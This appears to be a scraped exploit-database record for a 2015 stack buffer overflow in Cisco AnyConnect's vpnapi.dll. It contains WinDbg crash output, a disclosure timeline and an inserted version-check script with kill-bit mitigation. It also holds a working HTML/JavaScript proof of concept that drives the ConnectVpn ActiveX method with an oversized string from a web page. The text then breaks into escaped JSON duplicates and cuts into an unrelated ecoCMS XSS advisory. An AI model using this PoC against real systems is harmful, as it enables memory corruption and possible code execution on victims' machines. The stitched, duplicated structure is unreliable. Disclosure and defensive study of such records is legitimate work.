ID 1337DAY-ID-23757 Type zdt Reporter LiquidWorm Modified 2015-06-16T00:00:00
Description
Cisco AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when a large number of bytes is passed to the 'strHostNameOrAddress' parameter of the 'ConnectVpn' function, which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code.
<!--
Cisco AnyConnect Secure Mobility Client Remote Command Execution
Vendor: Cisco Systems, Inc.
Product web page: http://www.cisco.com
Affected version: 2.x
                  3.0
                  3.0.0A90
                  3.1.0472
                  3.1.05187
                  3.1.06073
                  3.1.06078
                  3.1.06079
                  3.1.07021
                  3.1.08009
                  4.0.00013
                  4.0.00048
                  4.0.00051
                  4.0.02052
                  4.0.00057
                  4.0.00061
                  4.1.00028
Fixed in: 3.1.09005
          4.0.04006
          4.1.02004
          4.1.02011
Summary: Cisco AnyConnect Secure Mobility Solution empowers your
employees to work from anywhere, on corporate laptops as well as
personal mobile devices, regardless of physical location. It provides
the security necessary to help keep your organization’s data safe
and protected.
Desc: The AnyConnect Secure Mobility Client VPN API suffers from
a stack buffer overflow vulnerability when a large number of bytes
is passed to the 'strHostNameOrAddress' parameter of the 'ConnectVpn'
function, which resides in the vpnapi.dll library, resulting in memory
corruption and overflow of the stack. An attacker can gain access to
the system of the affected node and execute arbitrary code.
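A defender-side check built from the version lists above and the CLSID used by the PoC below (an added example, not part of this advisory or of Cisco's tooling): it classifies an installed AnyConnect build against the first fixed build of its release branch and emits the Internet Explorer kill-bit command for the vpnapi control as the interim mitigation. Assumptions: branches newer than 4.1 are treated as not affected, and the reg.exe command is returned as a string for review or GPO deployment rather than executed.

```python
import re
from typing import Optional, Tuple

# First fixed build per release branch, taken from the "Fixed in" list.
# 4.1.02011 is also fixed, but 4.1.02004 is the earlier fixed build on 4.1.
FIRST_FIXED = {
    (3, 1): "3.1.09005",
    (4, 0): "4.0.04006",
    (4, 1): "4.1.02004",
}

# CLSID of the VpnApiLib.VpnApi control, as instantiated by the PoC's <object> tag.
ANYCONNECT_VPNAPI_CLSID = "{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"


def version_key(version: str) -> Tuple:
    """Turn an AnyConnect version such as '3.0.0A90' into a comparable tuple.

    Digit runs compare as integers and letter runs as strings, each tagged so
    that a mixed component like '0A90' never triggers an int/str comparison.
    """
    key = []
    for component in version.strip().split("."):
        for chunk in re.findall(r"\d+|[A-Za-z]+", component):
            key.append((0, int(chunk)) if chunk.isdigit() else (1, chunk.upper()))
    return tuple(key)


def branch_of(version: str) -> Tuple[int, int]:
    """Return the (major, minor) release branch, e.g. (4, 1) for '4.1.00028'."""
    parts = version.strip().split(".")
    if len(parts) < 2 or not parts[0].isdigit() or not parts[1].isdigit():
        raise ValueError(f"unrecognised AnyConnect version string: {version!r}")
    return int(parts[0]), int(parts[1])


def is_affected(version: str) -> bool:
    """True when the build predates the first fixed build of its branch."""
    branch = branch_of(version)
    fixed = FIRST_FIXED.get(branch)
    if fixed is not None:
        return version_key(version) < version_key(fixed)
    # 2.x and 3.0 are listed as affected and have no fixed build of their own.
    if branch < (3, 1):
        return True
    # Assumption: branches newer than those named in the advisory are not affected.
    return False


def killbit_reg_command(clsid: str = ANYCONNECT_VPNAPI_CLSID) -> str:
    """Build the reg.exe command that sets the IE kill bit for a control.

    Compatibility Flags 0x400 under the ActiveX Compatibility key stops
    Internet Explorer from instantiating the CLSID via <object classid=...>,
    which is exactly how the PoC reaches ConnectVpn from a web page.
    """
    key = r"HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" + "\\" + clsid
    return f'reg add "{key}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 /f'


def assess(version: str) -> dict:
    """Summarise exposure and the two remediation options for one installed build."""
    affected = is_affected(version)
    upgrade: Optional[str] = None
    if affected:
        # Branches without a fix (2.x, 3.0) must move to a fixed branch entirely.
        upgrade = FIRST_FIXED.get(branch_of(version), "a fixed build listed in the advisory")
    return {
        "version": version,
        "affected": affected,
        "upgrade_to": upgrade,
        "killbit": killbit_reg_command() if affected else None,
    }


if __name__ == "__main__":
    # Constructed sample inventory: a mix of affected and fixed builds from the lists above.
    for build in ["3.0.0A90", "3.1.08009", "3.1.09005", "4.1.00028", "4.1.02011"]:
        print(assess(build))
```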
==========================================================================
(f48.10cc): Unknown exception - code 000006ba (first chance)
(f48.10cc): C++ EH exception - code e06d7363 (first chance)
(f48.10cc): C++ EH exception - code e06d7363 (first chance)
(f48.10cc): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll -
eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
vpnapi!ConnectIfcData::setConfigCookie+0x9195:
748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000
0:000> g
(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
vpnapi!ConnectIfcData::setConfigCookie+0x9195:
748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000
0:000> d edi
088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:000> d edx
088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
<12308000 B
----
>512150-512154 B
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\RPCRT4.dll -
eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
RPCRT4!UuidCreate+0x835:
75440fc4 56 push esi
0:000> g
(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!)
eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
RPCRT4!UuidCreate+0x835:
75440fc4 56 push esi
0:000> d eax
004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client
004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn
004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\C
004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp
004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call
004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg
004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne
004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent...
0:000> d
004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> d esp+1500
00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t....
00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................
00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
==========================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
Vendor status:
[25.03.2015] Vulnerability discovered.
[28.03.2015] Vendor contacted.
[29.03.2015] Vendor responds asking more details.
[13.04.2015] Sent details to the vendor.
[15.04.2015] Asked vendor for status update.
[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as an incident manager takes ownership of the case they will be in contact.
[22.04.2015] Asked vendor for status update.
[28.04.2015] No reply from the vendor.
[04.05.2015] Asked vendor for status update.
[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation.
[12.05.2015] Asked vendor for confirmation.
[13.05.2015] Vendor resolved the issue, but is not yet sure of the release date.
[14.05.2015] Asked vendor for approximate scheduled release date.
[15.05.2015] Vendor informs that the defect is public (CSCuu18805).
[19.05.2015] Asked vendor for release information.
[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2.
[11.06.2015] Vendor releases versions 4.1.02011 and 3.1.09005 to address this issue.
[13.06.2015] Public security advisory released.
Advisory ID: ZSL-2015-5246
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php
Vendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805
25.03.2015
-->
<!DOCTYPE html>
<html>
<head>
<title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title>
</head>
<body>
<button onclick="O_o()">Launch</button>
<object id="cisco" classid="clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"></object>
<script language="JavaScript">
function O_o() {
//targetFile = "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll"
//prototype = "Sub ConnectVpn ( ByVal strHostNameOrAddress As String )"
//memberName = "ConnectVpn"
//progid = "VpnApiLib.VpnApi"
var netv = Array(255712).join("ZS");
var push = //~~~~~~~~~~~~~~~~~~~~~~~~//
/*(()()())*/
"ZSZSZSZSZSZSZ"+
"SZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZ"+ "SZSZ" +"SZSZSZ"+
"SZSZSZ"+ "SZSZ" +"SZSZSZ"+
"SZSZS"+ "ZSZS" +"ZSZSZ"+
"SZSZS"+ "ZSZS" +"ZSZSZ"+
"SZSZS"+"ZSZSZ"+"SZSZS"+
"SZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZSZ"+
"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ"+
"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZ" +"SZSZSZSZSZSZ"+ "SZSZ"+
"SZSZSZS" +"ZSZSZSZSZSZSZS"+ "ZSZS"+
"ZSZSZSZ" +"SZSZSZSZSZSZSZ"+ "SZSZ"+
"SZSZSZSZ"+ "SZSZSZSZSZSZSZSZS"+ "ZSZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS" +"ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+
"SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+
"S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+
"S"+ "Z"+ "S"+ "Z"+ "S"+ "S"+
"S"+ "Z"+ "S"+ "Z"+ "S"+ "S";
var godeep = netv.concat(push);
cisco.ConnectVpn godeep
}
</script>
</body>
</html>
# 0day.today [2018-04-12] #
+\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZ\" +\"SZ\" +\"SZ\" +\"SZ\" +\"SZ\"+ \"SZ\"+\r\n \"SZ\" +\"SZ\" +\"SZ\" +\"SZ\" +\"SZ\"+ \"SZ\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"Z\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"S\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"S\";\r\n \r\n \r\n var godeep = netv.concat(push);\r\n cisco.ConnectVpn godeep\r\n}\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-12] #", "objectVersion": "1.3"}
{"zeroscience": [{"lastseen": "2019-11-11T16:11:27", "bulletinFamily": "exploit", "description": "Title: Cisco AnyConnect Secure Mobility Client Remote Command Execution \nAdvisory ID: [ZSL-2015-5246](<ZSL-2015-5246.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 13.06.2015 \n\n\n##### Summary\n\nCisco AnyConnect Secure Mobility Solution empowers your employees to work from anywhere, on corporate laptops as well as personal mobile devices, regardless of physical location. It provides the security necessary to help keep your organization\u2019s data safe and protected. \n\n##### Description\n\nThe AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing a large number of bytes passed in the 'strHostNameOrAddress' parameter of the 'ConnectVpn' function, which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code. \n \n\\-------------------------------------------------------------------------------- \n \n` (f48.10cc): Unknown exception - code 000006ba (first chance) \n(f48.10cc): C++ EH exception - code e06d7363 (first chance) \n(f48.10cc): C++ EH exception - code e06d7363 (first chance) \n(f48.10cc): Stack overflow - code c00000fd (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll - \neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 \neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nvpnapi!ConnectIfcData::setConfigCookie+0x9195: \n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 \n0:000> g \n(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!) \neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 \neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nvpnapi!ConnectIfcData::setConfigCookie+0x9195: \n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 \n0:000> d edi \n088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n0:000> d edx \n088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 
\n088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n \n<12308000 B \n \n---- \n \n>512150-512154 B \n \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\syswow64\\RPCRT4.dll - \neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 \neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nRPCRT4!UuidCreate+0x835: \n75440fc4 56 push esi \n0:000> g \n(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!) \neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 \neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nRPCRT4!UuidCreate+0x835: \n75440fc4 56 push esi \n0:000> d eax \n004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client \n004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn \n004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\\C \n004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp \n004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call \n004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg \n004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne \n004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent... \n0:000> d \n004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 
\n004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA \n004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n0:000> d esp+1500 \n00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t.... \n00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................ \n00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nCisco Systems, Inc. - <http://www.cisco.com>\n\n##### Affected Version\n\n2.x \n3.0 \n3.0.0A90 \n3.1.0472 \n3.1.05187 \n3.1.06073 \n3.1.06078 \n3.1.06079 \n3.1.07021 \n3.1.08009 \n4.0.00013 \n4.0.00048 \n4.0.00051 \n4.0.02052 \n4.0.00057 \n4.0.00061 \n4.1.00028 \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) 32/64bit \nMicrosoft Windows 7 Ultimate SP1 (EN) 32/64bit \n\n##### Vendor Status\n\n[25.03.2015] Vulnerability discovered. \n[28.03.2015] Vendor contacted. \n[29.03.2015] Vendor responds asking more details. \n[13.04.2015] Sent details to the vendor. \n[15.04.2015] Asked vendor for status update. 
\n[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact. \n[22.04.2015] Asked vendor for status update. \n[28.04.2015] No reply from the vendor. \n[04.05.2015] Asked vendor for status update. \n[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation. \n[12.05.2015] Asked vendor for confirmation. \n[13.05.2015] Vendor resolved the issue, not sure for the release date. \n[14.05.2015] Asked vendor for approximate scheduled release date. \n[15.05.2015] Vendor informs that the defect is public (CSCuu18805). \n[19.05.2015] Asked vendor for release information. \n[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2. \n[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue. \n[13.06.2015] Public security advisory released. \n\n##### PoC\n\n[anyconnect_bof.html](<../../codes/anyconnect_bof.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://tools.cisco.com/bugsearch/bug/CSCuu18805> \n[2] <http://cxsecurity.com/issue/WLB-2015060070> \n[3] <https://packetstormsecurity.com/files/132298> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/103855> \n[5] <https://www.exploit-db.com/exploits/37287/> \n[6] <http://www.scip.ch/en/?vuldb.75948> \n[7] <http://www.vfocus.net/art/20150616/12230.html> \n[8] <https://www.cert.se/2015/06/sakerhetsbrist-i-cisco-anyconnect-secure-mobility-client> \n[9] <http://tif.mcafee.com/threats/14712>\n\n##### Changelog\n\n[13.06.2015] - Initial release \n[17.06.2015] - Added reference [2], [3], [4], [5] and [6] \n[23.06.2015] - Added reference [7], [8] and [9] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2015-06-13T00:00:00", 
"published": "2015-06-13T00:00:00", "id": "ZSL-2015-5246", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php", "title": "Cisco AnyConnect Secure Mobility Client Remote Command Execution", "type": "zeroscience", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/anyconnect_bof.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "description": "Vulnerability ID: HTB22353\r\nReference: http://www.htbridge.ch/advisory/xss_in_ecocms.html\r\nProduct: ecoCMS\r\nVendor: ecoCMS Team\r\nVulnerable Version: Current at 18.04.2010 and Probably Prior Versions\r\nVendor Notification: 18 April 2010 \r\nVulnerability Type: XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium \r\nCredit: High-Tech Bridge SA (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application. \r\n\r\nThe vulnerability exists due to failure in the "/admin.php" script to properly sanitize user-supplied input in "p" variable. 
